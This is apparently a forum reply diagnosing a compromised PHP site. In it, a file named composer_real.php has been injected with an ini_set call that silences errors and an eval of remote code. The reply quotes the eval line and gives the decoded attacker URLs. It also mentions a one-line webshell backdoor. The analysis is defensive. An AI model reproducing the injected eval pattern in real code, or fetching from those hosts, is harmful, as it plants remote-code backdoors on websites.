直观的看网页跳转的问题是在 composer_real.php 里。
正常的文件里是没有 第一行 ini_set 和 eval()这两个操作的。
ini_set 是把报错关了,然后 eval('?>'.file_get_contents(base64_decode('xxxx'))) 这个是在从远程获取 php 代码,根据你图里的 base64 解了下 地址是这个
http://8.jsc20244.com:81/jsc/529kaiwen.txt ,这个 txt 里放着 php 代码,这段代码最后的操作能看到用 curl 访问了另一个地址(
http://529.jsc20244.com:81/502.php),这个地址放在浏览器里显示 404 ,在 chrome 里用 f12 伪装成移动端浏览器,就会显示页面,“请使用 手机 设备打开”,可能就是你说的移动端跳转的地址。
至于这个 composer_real.php 文件怎么被搞的,就不知道了,列两个可能性:
1. 用户上传的 php 程序中,composer 被植入了 eval()那坨代码。
2. 你服务器被搞了,然后别人在 composer 里植入了恶意代码,比如通过你说的 pass.php 这样的一句话后门